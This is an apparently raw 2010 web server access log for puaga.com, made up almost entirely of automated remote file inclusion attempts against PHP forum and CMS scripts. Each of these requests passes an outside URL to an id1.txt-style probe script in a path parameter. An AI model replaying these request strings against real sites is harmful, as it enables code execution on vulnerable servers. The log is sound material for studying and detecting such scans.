63.223.85.28 - - [05/Mar/2010:11:20:05 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:20:05 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:20:18 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:20:48 -0800] "GET /logs/access_100203.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:20:48 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:20:48 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:21:05 -0800] "GET /logs/access_100206.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [05/Mar/2010:11:21:16 -0800] "GET /logs/access_100224.log%20%20/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [05/Mar/2010:11:22:25 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [05/Mar/2010:11:22:25 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [05/Mar/2010:11:22:25 -0800] "GET /logs/access_100226.log%20%20/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:24:12 -0800] "GET /logs/access_100203.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:24:12 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:24:12 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:24:21 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:24:21 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:24:21 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:24:24 -0800] "GET /logs/access_100206.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:24:31 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:24:31 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:24:31 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:21 -0800] "GET /logs/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:21 -0800] "GET /become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:21 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:21 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:23 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:23 -0800] "GET /logs/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:23 -0800] "GET /become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:25:23 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [05/Mar/2010:11:25:36 -0800] "GET /logs/access_100215.log%20%20/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:11:25:39 -0800] "GET /logs/access_100301.log HTTP/1.0" 200 1310194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:26:00 -0800] "GET /logs/access_100209.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:26:04 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:26:10 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:27:02 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:27:02 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:27:02 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:27:48 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:27:48 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:27:48 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:27:50 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:27:52 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:27:53 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:27:58 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:27:58 -0800] "GET /logs/access_100203.log%20%20///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:27:58 -0800] "GET //write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:28:07 -0800] "GET /logs/access_100206.log%20%20///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:28:21 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:28:21 -0800] "GET /logs/access_100203.log%20%20///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:28:21 -0800] "GET //write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:28:27 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:28:29 -0800] "GET /logs/access_100206.log%20%20///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:28:46 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:28:46 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:28:46 -0800] "GET ///delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:28:46 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:28:54 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:29:21 -0800] "GET /logs/access_100206.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:29:21 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:29:21 -0800] "GET /logs/access_100203.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:29:21 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:30:00 -0800] "GET /logs/access_100209.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:30:11 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:30:52 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:30:52 -0800] "GET //write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:30:52 -0800] "GET /logs/access_100203.log///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:30:52 -0800] "GET /logs/access_100206.log///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:31:11 -0800] "GET /logs/access_100209.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:31:15 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:31:24 -0800] "GET //write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:31:24 -0800] "GET /logs/access_100203.log///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:31:24 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:31:25 -0800] "GET /logs/access_100206.log///write_comment_update.php?board_skin_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [05/Mar/2010:11:32:53 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
124.193.89.226 - - [05/Mar/2010:11:32:53 -0800] "GET /logs/access_100128.log%20//board/bbs/delete_all.php?board_skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
124.193.89.226 - - [05/Mar/2010:11:32:53 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:32:54 -0800] "GET /logs//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:32:54 -0800] "GET /admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:32:55 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:33:07 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:33:07 -0800] "GET /logs//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:33:11 -0800] "GET /admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:33:18 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:33:55 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:33:55 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:33:55 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:33:57 -0800] "GET /admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.24.174.51 - - [05/Mar/2010:11:33:59 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.24.174.51 - - [05/Mar/2010:11:33:59 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.24.174.51 - - [05/Mar/2010:11:33:59 -0800] "GET /logs/access_100224.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:34:01 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:34:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:34:05 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:34:41 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:34:41 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:34:41 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:35:02 -0800] "GET /logs/access_100219.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:35:05 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:35:11 -0800] "GET /logs/access_100211.log%20%20/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:35:11 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:35:16 -0800] "GET /logs/access_100211.log%20%20/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:11:35:18 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:35:19 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [05/Mar/2010:11:35:40 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [05/Mar/2010:11:35:40 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [05/Mar/2010:11:35:42 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:36:03 -0800] "GET /logs/access_100219.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [05/Mar/2010:11:36:13 -0800] "GET /logs/access_100128.log///delete.php?board_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [05/Mar/2010:11:36:13 -0800] "GET //delete.php?board_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [05/Mar/2010:11:36:13 -0800] "GET /logs///delete.php?board_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [05/Mar/2010:11:36:24 -0800] "GET /logs/access_100226.log/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [05/Mar/2010:11:36:30 -0800] "GET /logs/access_100220.log///delete.php?board_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.166 - - [05/Mar/2010:11:36:48 -0800] "GET /akifbar/images/AkifBarBottom.png HTTP/1.1" 200 332 "-" "Googlebot-Image/1.0" "puaga.com"
79.141.1.200 - - [05/Mar/2010:11:37:04 -0800] "GET /logs/access_100224.log/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:37:39 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:11:37:48 -0800] "GET /logs/access.log/port.php?content=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:11:37:48 -0800] "GET /logs/port.php?content=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
